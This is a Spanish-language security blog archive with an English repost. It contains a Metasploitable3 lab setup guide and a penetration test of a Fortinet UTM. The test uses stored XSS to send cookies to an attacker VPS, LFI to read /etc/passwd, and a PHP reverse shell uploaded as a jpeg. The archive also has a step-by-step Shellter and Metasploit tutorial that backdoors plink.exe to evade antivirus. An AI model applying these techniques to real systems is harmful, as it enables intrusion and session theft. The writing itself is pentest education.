Archivo
Metasploitable3 Practice labs
Como algunos saben, parte de mis actividades profesionales en seguridad informática están destinadas a los temas de capacitación y entrenamiento, es así que al desarrollar los ejercicios para un nuevo curso de Ethical Hacking, empecé a desarrollar los correspondientes a Metasploitable 3 Al terminar los ejercicios se me ocurrió crear este documento.
El objetivo del material es proporcionar una guía práctica para desarrollar la
explotación de vulnerabilidades en Metasploitable 3 desde la perspectiva de un
Pentester / Ethical Hacker.
La misma representa una recopilación de diversos tutoriales escritos y en vídeo, los
cuales han sido probados y modificados tratando de aplicar una metodología sencilla y
que sobre todo provea un marco de referencia para la evaluación de vulnerabilidades.
Todas las instrucciones del presente material fueron realizadas con Kali Linux y con la
instalación de Metasploitable3 realizada en este enlace:
https://jroliva.net/2018/01/21/instalacion-metasploitable3/
Descarga : http://www.silcom.com.pe/papers/Paper_Metasploitable3_Practice_labs.pdf
Espero les sirva
Juan Oliva.
Instalación de Metasploitable3 en Linux Mint/Ubuntu
Todos los que estamos relacionados en el mundo de Ethical Hacking y el Pentesting hemos usado Metasploitable la cual es una maquina virtual permite desarrollar ataques utilizando Metasploit Framework. La misma es utilizado para una diversidad de propósitos; como entrenamientos para la explotación de red, desarrollo de exploits, evaluación de software, entre otros propósitos. Metasploitable hasta la versión 2 era un disco duro la cual se instalaba fácilmente sobre VirtualBox o Vmware, sin embargo desde le 2012 que no se actualizaba y poco a poco venia perdiendo vigencia.
El año pasado la empresa Rapid7 creadores de la misma lanzaron la nueva versión «Metasploitable3» la misma que hasta la fecha está basada en Windows lo cual cambia bastante toda la lógica llevada hasta el momento, ya que su predecesor estaba basado en Linux.
Sin embargo esta nueva maquina tiene una serie de vulnerabilidad actuales muy interesantes que vale la pena revisar, a continuación veremos la forma de instalar la maquina, ya que la instalación de esta versión ha cambiado mucho.
Escenario :
S.O. Ubuntu Xenial 16.04
VirtualBox 5.2.4
1- Instalación de Prerrequisitos
Packer
wget https://releases.hashicorp.com/packer/1.1.3/packer_1.1.3_linux_amd64.zip?_ga=2.259436163.8806393.1516559508-2105737727.1516559508 -O packer_1.1.3_linux_amd64.zip
unzip packer_1.1.3_linux_amd64.zip
sudo mkdir /usr/local/packer
sudo mv packer /usr/local/packer/
nano ~/.profile
Al final del archivo agregar : export PATH=$PATH:/usr/local/packer
Luego el comando : source ~/.profile
Si todo salio bien al realizar el comando packer –version deberá responder de la siguiente forma.
Vagrant
wget https://releases.hashicorp.com/vagrant/2.0.1/vagrant_2.0.1_x86_64.deb?_ga=2.260144013.1615441003.1516560525-1954706866.1516560525 -O vagrant_2.0.1_x86_64.deb
sudo dpkg -i vagrant_2.0.1_x86_64.deb
vagrant plugin install vagrant-reload
Si todo salio bien deberíamos tener esta respuesta :
2.- Instalación de Metasploitable3
git clone https://github.com/rapid7/metasploitable3.git
cd metasploitable3/
Ahora comenzar con la construcción de la maquina virtual con el siguiente comando
packer build windows_2008_r2.json
Con ello, comenzara a descargar la ISO de Windows 2008 por tanto habrá que esperar a la descarga 😀
Luego comienza la construcción de la maquina virtual
Una vez finalizado el proceso nos mostrara lo siguiente :
Ahora proceder con el segundo paso de la construcción con el siguiente comando
vagrant box add windows_2008_r2_virtualbox.box –name=metasploitable3
Una vez culminado finalizamos la construcción de la maquina con el comando que la importa hacia VirtualBox :
vagrant up
Con ello tenemos finalizada la construcción de la maquina y la tendremos en la lista de maquina virtuales de virtual Box
Luego de identificarla corremos un nmap y vemos que tiene varios servicios para explorar.
3.- Guias
Finalmente les comparto algunas guías para que puedan practicar con Metasploitable3
http://www.hackingarticles.in/manual-penetration-testing-metasploitable-3/
http://ultimatepeter.com/metasploitable-3-meterpreter-port-forwarding/
http://www.hackingarticles.in/ftp-service-exploitation-metasploitable-3/
http://www.hackingarticles.in/penetration-testing-metasploitable-3-smb-tomcat/
http://www.hackingarticles.in/exploitation-metasploitable-3-using-glassfish-service/
http://www.hackingarticles.in/hack-metasploitable-3-using-mysql-service-exploitation/
Espero les sirva.
Saludos
Juan Oliva
@jroliva
Hacking fortinet – bypassing UTM (English version)
Spanish version :https://jroliva.wordpress.com/2015/07/31/hacking-fortinet-bypassing-utm/
Hello, in the previous post «Hacking FoAceptarrtinet – SQLI test» I made clear my position that I was unhappy with the results obtained. And do not misunderstand, beyond that we received very good feedback from the Fortinet brand which is important to us.
by showing a very good position and receptive to this type of study, however we needed perform another tests the offensive security because SQLI is not everything, Now the current attacks go far beyond, including combined attacks and techniques.
It is so a few days ago, again with my good friend Alexis Torres, developed the following test, detailed below:
Scenario:
The scenario is implemented as follows:
192.168.100.100 — IP WEB SERVER on LAN
192.168.100.120 — IP MS WINDOWS 7 on LAN
192.168.100.1 — IP UTM on LAN
192.168.13.100 — IP SERVIDOR WEB en WAN
192.168.13.200 — IP UTM en LAN
192.168.13.202-203 — ATTACKER 1 (KALI LINUX)
192.80.190.11X — ATTACKER 2 (VPS CENTOS 6.X)
Setup UTM
A Appliance Fortinet D60 with licenses of the IPS and Antivirus activated as you can see below:
Also, during the tests detailed below, several configuration profiles were tested as follows:
Profile «Default» activated in the IPS
Profile «High Security» activated in the IPS
Profile «protect_http_server» activated in the IPS
Profile «default» activated in the AV
Also set within this profile (AV), the proxy mode, which allows you to capture traffic on a cache, examine it and then send it to the client.
Then to validate that the IPS is configured correctly, we perform a basic test of SQLI to verify that blocks correctly.
trying to introduce a SQLI in the web application, we see that the IPS blocks attack:
All validated, we start with the tests.
Test 1 – Session Hijacking using XSS
The first attack we tested is the «session hijacking» using stored XSS, previously we had proven that XSS reflected were not detected by the IPS, so that when combined with other attack, the IPS had even less likely to be detected , as it’s shown in the following:
As shown, the XSS attack sent via the «document.cookie» object , current session to an external URL http: //192.80.190.1XX/b.php
Then the attacker 2 receives the string sent by the XSS stored in the web application, as follows:
As shown, the attack result is received in the VPS Linux (attacker 2) only opening a socket connection using netcat to port 80 and the session cookie is received.
After completing the attack, let the UTM web interfase and we do not have the «Security Log / Intrusion Protection» section, that is not registered and does not block it.
these attacks are maded in this scenario:
The attacker enters to intranet, who has an invited profile , he identifies that web application has XSS vulnerability and it stores on a common place in the web application then he deploys the malicious URL. The victim enters to intranet like whatever job day, he can review the balance of the day or some import information or maybe he could get an administrator profile.
When the victim gets to click to malicious url, the cookies are sent to attacker’s console.
the attacker can use that cookie in order to access to web application with the same victim’s profile and access all the information.
Test 2 – LFI
Including local files, allows viewing files that are not in the directory of your Web server publishing, as the following example:
In that case we are viewing the «passwd» file in the «etc» directory of the operating system.
The attack is complete and is never detected by the IPS.
Test 3 – Reverse Shell using File Upload
It is common in Web applications has forms to upload files, whether images, documents docx, xlsx or pdfs inclusive.
However, this represents a major vector for an attacker because it allows the physical write to the server, which is a very tempting opportunity.
We will not explain the many techniques to evade filters must have an upload form, however we will use a basic, is rename the extension to the flight, to upload your file, this file generates the reverse shell through the web application.
Start the the process of the attack
A. Download and set up reverse shell file.
Download PHP reverse shell file and configured as follows:
As we can see, in the variable $IP we are declaring the Linux VPS IP to which the shell is sent through the output port 1234, declared the variable $port
B. Rename to confuse evade the upload filter.
Then change the file extension to jpeg as shown below:
C. Upload and execute file
With our shell covered in a jpeg file, we will upload
Then using a proxy as «burp suite» we will rename the file extension on flight.
See a little more detail the change
Then, the file is uploaded, and execute in the URL where it is housed in the web server.
Later, the attack is complete, without being blocked by the UTM and the reverse shell is obtained, in the listening port 1234 of the VPS as shown below:
Test 4 – Avoiding the perimeter Antivirus and winning remote shell in Windows 7
Context: Some of the features of all UTM is to have an antivirus perimeter, your objetive to be the first defense against the entry of infected files, before they reach workstations of users, these attacks are best called «client side attacks».
The attack: In post past «Evading Antivirus with Shellter and Metasploit» showed how they could evade the local antivirus,
– Creating the infected file
Let’s create a Shellter infected file as follows:
As seen in the capture, it configures the IP 192.179.13.203 , will be receiving the reverse shell on port 5555, in the case that the infected file is execute in the victim.
– Execute the handler in Mestasploit
Now got one handler listening for the reverse shell
As shown, it is waiting for the reverse shell on port 5555
– Downloading the infected file on the client.
Now from the Windows, we will download the infected file, where the perimeter antivirus should react and do not allow downloading.
As you can see, it is possible to completely download the infected file.
– Gaining remote shell
Now what follows is run the file, and get the reverse shell.
I pause to explain the following.
Peculiar behavior
When executed the first time the infected file, the reverse shell was obtained, but after repeating the process several times, it was no longer possible, the UTM detect and block the reverse shell,but again, but I repeat, then gained 2 or 3 times the previously reverse shell.
Negative behavior – Obtain the shell
Positive behavior – block shell
As shown in previous screenshots, twice the attack could be completed (the shell was obtained) but then this was no longer possible.
As you can see, the handler can not get to complete the process of obtaining meterpreter session.
And obviously the reason was because the IPS detected the attack.
Abnormal behavior – Obtein the shell
We made the analysis of the packages, we could see that the shell was blocked, not at the time when Windows send the package handler, if not when, returned back to Windows (incoming packet) and at that moment, it was detected by IPS.
Because of this, we changed our configuration in file infected to send the shell to VPS Linux and this was the result :
As you can see after running the file, you may receive the connection in the VPS.
Conclusions
- The Tests in the side of pentester were of such Gray box, not known the type of configuration in the UTM but but yes , the IP address of targets.
- The tests are very used by computer criminals, especially when performing combinations of techniques may be more likely to succeed.
- My opinion It’s necessary implement additional systems to monitor attacks.
- Must be generated in the UTM custom rules for each type of situation, in the case of fortinet, this link is important.
- In the proof of AV engine in client side, only it was made with a type of payload, «meterpreter» that is denominated in the IPS signatures as «Shell reversing» , there isn’t unique payload kind, and the target in Windows(known signature).
- We don’t use any kind of sophisticated technique as crypter, encoder, reassemble however we use a dynamic code injector to PE, to create a malicious executable, after that in the pictures, we can see that originate a communicate channel between evilServer and the target.
- With my experience in security projects deployments for enterprises, there is a great dependability in UTMs about their security information because they can find “all defense in one” when the reality is the first line defense perimeter in some company.
- In addition, there aren’t enough to have firmware updated and licenses paid, in first point, we should assure that the configuration has a good practice because it can get a great impact without much effort to attacker 😀
Finally, tests have no intention to somehow discredit a particular brand, all the opposite, have the spirit carried out with other security appliance and other brands, and improve the security of bussines applications.
For example, personally pending testing by a product of the same brand, called FortiWeb, which is a much more specialized in web attacks protection.
Waiting the new tests !!
Saludos
Juan Oliva
@jroliva
Hacking fortinet – bypassing UTM
English version : https://jroliva.wordpress.com/2015/07/31/hacking-fortinet-bypassing-utm-english-version/
En las pruebas realizadas en el post anterior «Hacking Fortinet – SQLI test» dejé en claro mi posición respecto a que me sentía inconforme por los resultados obtenidos.
Y no lo mal interpreten, mas allá de que recibimos muy buenos comentarios de la marca Fortinet lo cual es importante, por que como lo indiqué, muestran una posición muy buena y receptiva ante este tipo de estudios, mas allá de eso, era necesario realizar pruebas de seguridad ofensiva un poco mas extendidas, ya que el SQLI no lo es todo y ahora los ataques actuales van mucho mas allá, inclusive combinándose entre si.
Es así que hace unos días, nuevamente en conjunto con mi buen amigo Alexis Torres , desarrollamos los siguientes test que a continuación detallo:
Escenario :
Como se muestra en el escenario implementado es el siguiente:
192.168.100.100 — IP SERVIDOR WEB en LAN
192.168.100.120 — IP MS WINDOWS 7 en LAN
192.168.100.1 — IP UTM en LAN
192.168.13.100 — IP SERVIDOR WEB en WAN
192.168.13.200 — IP UTM en LAN
192.168.13.202-203 — ATACANTE 1 (KALI LINUX)
192.80.190.11X — ATACANTE 2 (VPS CENTOS 6.X)
Setup del equipo
Un equipo Fortinet D60 con las licencias de IPS y Antivirus activado como se puede ver a continuación :
Así mismo, durante las pruebas que a continuación se detallarán, se probaron varios perfiles de configuración como los siguientes :
Perfil «default» activado en el IPS
Perfil «High Security» activado en el IPS
Perfil «protect_http_server» activado en el IPS
Perfil de AV en modo «default»
También se configuró dentro de este perfil, el modo proxy, que permite capturar el trafico en una cache, examinarlo y luego enviarlo al cliente.
Luego para validar que el IPS se encuentre correctamente configurado realizamos una prueba básica de SQLI para verificar que bloquee correctamente.
Luego tratar de introducir un SQLI vemos que el equipo lo bloquea:
Ahora con todo validado, empezamos con las pruebas.
Test 1 – Session Hijacking usando XSS
El primer ataque que probamos es el robo de sesiones (session hijacking) haciendo uso de XSS almacenado, previamente ya habíamos probado que los XSS reflejados no eran detectados por el IPS de tal forma que al combinarlo con otro tipo de ataque era menos probable aun que sea detectado, como se muestra a continuación :
Como se muestra, se envía vía el objeto «document.cookie» la sesión actual a una URL externa http://192.80.190.1XX/b.php
Luego el atacante 2, recibe la cadena disparada por el XSS almacenado de la siguiente forma :
Como se muestra el resultado del ataque se recibe en el VPS Linux ( ver gráfica) solo abriendo un socket de conexión median netcat al puerto 80 , y se recibe toda la cookie de sesión , que posteriormente servirá para autenticarse en la aplicación web donde estuvo logueada la víctima.
Si no la ven aun 😀 imagínense este escenario.
El atacante, ingresa a la intranet de la empresa, cuyo perfil es solo de invitado, identifica la vulnerabilidad de XSS almacenado sobre un lugar común en la aplicación web e implanta la URL maliciosa, La víctima, se loguea como todos los días en la intranet de la empresa a revisar digamos, los balances del día, en este caso tiene perfil de administrador de la empresa, hace clic sobre el lugar común donde está la URL maliciosa y envía su cookie de sesión al atacante, luego el atacante usa esa cookie para ingresar a la aplicación con el mismo perfil de la víctima y acceder a toda la información que le permite ese perfil.
Ojalá que ahora si la vean 😀
Una vez completado el ataque, vamos al equipo y vemos que no tenemos el apartado «Security Log/Intrusion Protection» es decir no registra y no lo bloquea.
Test 2 – LFI
La inclusión de archivos locales, permite la visualización de archivos que no están en el directorio de publicación del servidor web, como el siguiente ejemplo :
En ese caso estamos visualizando el archivo «passwd» en el directorio «etc» del sistema operativo.
El ataque se completa y nunca es detectado por el IPS.
Test 3 – Shell reverso usando File Upload
Es común dentro de las aplicaciones web tiene formularios para cargar o subir archivos, ya sea imágenes, documentos docx, xlsx o pdfs inclusive.
Sin embargo ello representa uno de los principales vectores para un atacante ya que permite la escritura física en el servidor, lo cual es una oportunidad muy apetitosa.
No vamos a ver las innumerables técnicas para como evadir los filtros que tiene que tener un formulario de upload, sin embargo vamos a usar uno básico que consiste en renombrar la extensión al vuelo para subir nuestro archivo que al final disparara el shell reverso.
Entonces iniciemos el proceso.
A.- Descargar y configurar el shell
Descargamos nuestro php reverse shell y lo configuramos de la siguiente forma :
Como podemos ver en la variable $IP estamos declarando la IP del VPS Linux a la cual se enviará el shell, mediante el puerto de salida 1234 declarado en la variable $port
B.- Renombrar para confundir evadir al upload
Luego cambiamos la extensión del archivo de a jpeg como vemos a continuación:
C.- Subir y ejecutar
Con nuestro shell encubierto en un archivo jpeg vamos a subirlo
Luego haciendo uso de un proxy como «burp suite» vamos a renombrar al vuelo la extensión del archivo.
Vemos un poco mas al detalle el cambio
Luego hemos conseguido que suba el archivo y lo ejecutamos en la URL donde se encuentra alojado:
El ataque se completa, sin ser bloqueado por el UTM y se obtiene el shell reverso en el puerto de escucha 1234 del VPS como se muestra a continuación:
Test 4 – Evadiendo el Antivirus de perímetro y ganando shell remota en Windows 7
Contexto: Parte de las características de todo UTM es contar con un antivirus de perímetro, es decir ser la primera defensa ante la entrada de archivos infectados, antes de que estos lleguen a las estaciones de trabajo de los usuarios y puedan comprometer de alguna forma sus estaciones de trabajo, estos ataques son mejor llamados «ataques del lado del cliente».
El ataque: En post pasado «Evadiendo Antivirus con Shellter y Metasploit» mostré como se podía evadir el antivirus local , sin embargo ahora, tenemos un antivirus de perímetro que no debería dejar descargar el archivo infectado.
– Creando el archivo infectado
Vamos a crear un archivo infectado con shellter de la siguiente forma:
Como se ve en la captura, se configura que la IP 192.179.13.203 será quien reciba el shell reverso en el puerto 5555 , en el caso de que se ejecute el archivo infectado.
– Levantando el handler en Mestasploit
ahora levantamos un handler de escucha para recibir el shell reverso
Como se muestra se está esperando el shell en el puerto 5555
– Descargando el archivo infectado en el cliente.
Ahora desde la estación Windows, vamos descargar el archivo infectado, en donde el antivirus de perímetro debería reaccionar.
Como se puede ver , es posible descargar completamente el archivo infectado.
– Ganando shell remota
Ahora lo que sigue es ejecutar el archivo para obtener la shell reversa, aquí quiero detenerme a explicar lo siguiente.
Comportamientos peculiares
Cuando se ejecutó las primeras veces el archivo se puedo completar su ejecución y se obtuvo la shell reversa, sin embargo luego de repetir algunas veces el proceso esto ya no se pudo , es decir el UTM detecto y bloqueo la shell reversa, pero repito después de amenos a ver obtenido 2 o 3 veces la shell reversa.
Comportamiento negativo – Obtención de la shell
Comportamiento positivo – bloqueo de la shell
Como se aprecia en las capturas anteriores al menos se pudo obtener en todos oportunidades se pudo completar el ataque (se obtuvo la shell) pero luego esto ya no fue posible, no se lograba obtener el shell
Como se puede ver, el handler no puede obtener completar el proceso de obtener la sesión de meterpreter .
Y evidentemente la razón fue por que el IPS detecto el ataque
Comportamiento anómalo – obtención de la shell
Como lo indicamos en un momento el IPS detecto la shell reversa , analizando un poco los paquetes pudimos ver que el shell era bloqueada, no en el momento cuando en Windows expulsa el paquete al handler, si no era cuando este, regresaba nuevamente al Windows ( paquete de entrada) y en ese momento era detectado por el IPS.
Debido a esto, cambiamos la configuración del nuestro archivo infectado para que envié la shell al VPS Linux y este fue el resultado.
Como se puede ver luego de ejecutar el archivo, se puede recibir la conexión en el VPS.
Conclusiones
- Las pruebas del lado del pentester fueron de tipo GrayBox, es decir no se tenia conocimiento del tipo de configuración que tenia el equipo UTM, pero si de las direcciones IP de los objetivos.
- Las pruebas realizadas son muy utilizadas por delincuentes informáticos, sobre todo al realizar combinaciones de técnicas es posible tener mayor probabilidad de éxito.
- Es necesario implementar sistemas complementarios para monitorear ataques.
- Es necesario generar reglas personalizadas en el UTM , para cada tipo de situación.
- En las pruebas de AV del lado del cliente, solo fueron realizadas con un tipo de payload, “meterpreter” que es mostrado en las firmas IPS como “Shell reversing” habría que tener en cuenta que no es el único tipo de payload y que el target es directo, es decir hacia Windows (firma conocida).
- No se usa ningún tipo de crypter, encoder, reassembler sino un injector de código dinámico al PE para crear el ejecutable malicioso, el cual como se muestra otorga un canal de comunicación, entre el evilVPS y el target.
- Con mi experiencia en despliegues de seguridad perimetral para empresas, he podido constatar la gran confianza que se tiene a los UTMs como un «all in one» debido a que son económicos y contienen diversas firmas de seguridad en contenidos, cuando realmente estos equipos son solo la primera línea de defensa.
- Además de la actualización de firmas y pago en licencias, se debe tener en cuenta las configuraciones realizadas por el consultor o experto que por mala praxis suelen proveer blancos directos sin necesidad de mucho esfuerzo para el atacante :D.
Finalmente, las pruebas realizadas no tienen la intensión de desprestigiar de alguna forma a una marca en particular, por el contrario, tienen el espíritu de que se realicen con otro tipo de equipos y por supuesto, mejorar la seguridad de las aplicaciones empresariales.
Por ejemplo personalmente esta pendiente realizar pruebas con un equipo de la misma marca que es FortiWeb , que es un equipo mucho mas especializado en protección de ataques web,
Esperen esas pruebas!!
Saludos
Juan Oliva
@jroliva
Evadiendo Antivirus con Shellter y Metasploit
Las técnicas para evación de antivirus son muy diversas y cada vez evolucionan , sin embargo cada cierto tiempo aparecen nuevas técnicas unas mas buenas que otras.
Shellter, es una herramienta de inyección de shell dinámica, según sus autores, probablemente el primero infecta PE dinámico, se puede utilizar para inyectar shells en programas para Windows basados en 32bits ( programas en 32bits) sin embargo esto no representa una limitante, ya que es muy usual tener Windows a 64bits y tener instalado programas a 32bits.
Shellter aprovecha la estructura original del PE en los archivos y no aplica ninguna modificación, añade una sección extra con RWE , además usa un enfoque dinámico único, lo cual lo hace imperceptible por los antivirus.
Vamos a ver como es su uso:
1.- ESCENARIO
Kali Linux en la IP 192.168.1.36
Windows 7 con AVG Antivirus en la IP 192.168.1.35
2.- SETUP
Es necesario descargar shellter desde la pagina https://www.shellterproject.com/download/ en esta caso usaremos la versión 4.0
wget http://www.silcom.com.pe/soft/shellter.zip ( Sitio alternativo)
unzip shellter.zip
mv shellter /usr/share/
3.- INICIAR SHELLTER
– Vamos a usar el archivo «plink.exe» el cual se ubica en Kali Linux y moverlo a la carpeta donde tenemos shellter .
cp /usr/share/windows-binaries/plink.exe /usr/share/shellter/
– Luego iniciaremos shellter de la siguiente forma:
wineconsole shellter.exe
4.- CONFIGURACIÓN DE SHELLTER
– Escojer modo automatico con la opción «A»
– Luego indicaremos el programa al cual le inyectaremos el shell code el cual es el archivo plink.exe previamente copiado.
PE Targer : plink.exe
– Luego cuando aparezca la lista de payloads elegir la opción «L»
Use a listed payload or custom: L
– Luego elegir la opcion «1»
Select payload by index: 1
– Ahora configuraremos los datos de retorno del shell reverso
set LHOST : 192.168.1.36 ( IP de Kali Linux)
set LPORT : 5555 ( Puertos donde retornará la shell
– Finalmente si todo salio bien, tendremos un mensaje «Inyection Verified» y luego presionamos «Enter» y finalizaremos shellter.
Con esto hemos conseguido que el archivo plink.exe esté infectado con el shell reverso.
5.- ACTIVANDO EL HANDLER CON METASPLOIT
– Iniciamos con msfconsole
– Ahora pondremos a la escucha el handler en el puerto 5555
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.36
set lport 5555
exploit
6.- AHORA VAMOS AL WINDOWS Y PROBAMOS
– Mediante alguna técnica de ingeniería social ( y de esas hay muchas) conseguimos que el archivo «plink.exe» sea ejecutado en la víctima.
– Como podemos ver tenemos una bonita sesión de meterpreter 😀 sin que el antivirus reaccione.
– Ahora podemos hacer un par de cosas
Bueno ya estamos adentro, la herramienta se ve prometedora.
UPTADE 03/2016
Para ejecutar shellter en Kali 2016.1 es necesario correr lo siguiente antes de wineconsole shellter.exe:
dpkg –add-architecture i386 && apt-get update && apt-get install wine32
Espero les sirva
Juan Oliva
@jroliva
Posts Más Vistos
- Explotando Vulnerabilidad MS17-010 o WannaCry
- Elastix Callcenter ¨La guia total¨
- Howto Goautodial Callcenter
- Hacking fortinet - bypassing UTM (English version)
- Configurar OPENVPN en equipos YEALINK
- Desactivando SIP ALG en Fortinet
- Asterisk SIP Realtime , extensiones sip desde base de datos
- Integración de Jenkins + SonarQube [DevSecOps]
- Probando la detección de la vulnerabilidad OpenSSL CCS Injection Attack (CVE-2014-0224)
- OWASP Broken Web Applications Project